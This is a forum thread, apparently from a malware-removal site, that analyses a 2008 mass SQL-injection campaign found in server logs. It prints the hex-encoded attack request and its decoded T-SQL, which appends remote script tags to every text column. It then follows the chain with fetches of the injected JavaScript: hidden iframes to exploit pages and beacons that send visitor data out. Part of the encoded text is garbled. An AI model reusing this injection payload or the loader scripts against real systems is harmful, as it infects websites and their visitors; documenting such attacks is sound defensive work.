xxx.xxx.xxx.xxx - - [20/Aug/2008:20:17:01 +0000] "GET /forums/index.php?showtopic=1440';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59  from: http://bsalsa.com/ )" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"!
></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Weve also seen a second version of this script, differences as follows
Code: [Select]
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652!
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like2!
rrR#懵鱂桭芐闱67&B7&3&嘒GⅡ鱳ws"柶26怫77'72鱮妲2#懵67&C懵乙rrr攄UD4銾匓e$粢F&芔7W'6"斿DB2T銪4孽4RF&芔7W'6"DT哪4DRF&芔7W'62




Code: [Select]
--11:38:09--  http://www2.1000ylc.cn/csrss/w.js
           => `w.js'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/notnew.htm></iframe>");

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Code: [Select]
--11:39:44--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500



Code: [Select]
--11:40:21--  http://www2.1000ylc.cn/csrss/new.htm
           => `new.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--11:41:56--  http://www2.1000ylc.cn/csrss/notnew.htm
           => `notnew.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2087412.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>





Code: [Select]
--11:43:17--  http://s96.cnzz.com/stat.php
           => `stat.php'
Resolving s96.cnzz.com... 219.232.243.5
Connecting to s96.cnzz.com[219.232.243.5]:80... connected
HTTP request sent, awaiting response... 200 OK

This returned a 0 byte page


Code: [Select]
--11:44:38--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');



Code: [Select]
--11:46:04--  http://js.users.51.la/2087412.js
           => `2087412.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087412" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7412tf="51la";var a7412pu="";var a7412pf="51la";var a7412su=window.location;var a7412sf=document.referrer;var a7412of="";var a7412op="";var a7412ops=1;var a7412ot=1;var a7412d=new Date();var a7412color="";if (navigator.appName=="Netscape"){a7412color=screen.pixelDepth;} else {a7412color=screen.colorDepth;}<\/script><script>a7412tf=top.document.referrer;<\/script><script>a7412pu =window.parent.location;<\/script><script>a7412pf=window.parent.document.referrer;<\/script><script>a7412ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7412ops=(a7412ops==null)?1: (parseInt(unescape((a7412ops)[2]))+1);var a7412oe =new Date();a7412oe.setTime(a7412oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7412ops+ ";path=/;expires="+a7412oe.toGMTString();a7412ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7412ot==null){a7412ot=1;}else{a7412ot=parseInt(unescape((a7412ot)[2])); a7412ot=(a7412ops==1)?(a7412ot+1):(a7412ot);}a7412oe.setTime(a7412oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7412ot+";path=/;expires="+a7412oe.toGMTString();<\/script><script>a7412of=a7412sf;if(a7412pf!=="51la"){a7412of=a7412pf;}if(a7412tf!=="51la"){a7412of=a7412tf;}a7412op=a7412pu;try{lainframe}catch(e){a7412op=a7412su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087412&tpages=\'+a7412ops+\'&ttimes=\'+a7412ot+\'&tzone=\'+(0-a7412d.getTimezoneOffset()/60)+\'&tcolor=\'+a7412color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7412of)+\'&vpage=\'+escape(a7412op)+\'" \/>\');<\/script>');

Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 22, 2008, 11:12:17 am
Reply #104

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Sample Log entry, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET /forums/index.php?showtopic=3063';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; .NET CLR 1.1.4322; InfoPath.1)" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--11:43:29--  http://www0.douhunqn.cn/csrss/w.js
           => `w.js'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--11:45:34--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>


Code: [Select]
--11:48:08--  http://www0.douhunqn.cn/csrss/new.htm
           => `new.htm'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--11:51:03--  http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
           => `stat.php?id=1019605&web_id=1019605'
Resolving s96.cnzz.com... 219.232.241.133
Connecting to s96.cnzz.com[219.232.241.133]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.17388800 1219402362';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";


Code: [Select]
--11:55:32--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 122.224.146.36
Connecting to js.users.51.la[122.224.146.36]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');


Code: [Select]
--11:58:01--  http://www.cnzz.com/stat/website.php?web_id=1019605
           => `website.php?web_id=1019605'
Resolving www.cnzz.com... 127.0.0.1
Connecting to www.cnzz.com[127.0.0.1]:80... connected
HTTP request sent, awaiting response... 500

Comment, null rooted by DNS.


Code: [Select]
--11:59:17--  http://222.77.187.203/stat.htm?id=1019605
           => `stat.htm?id=1019605'
Connecting to 222.77.187.203:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
Power by Cnzz
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment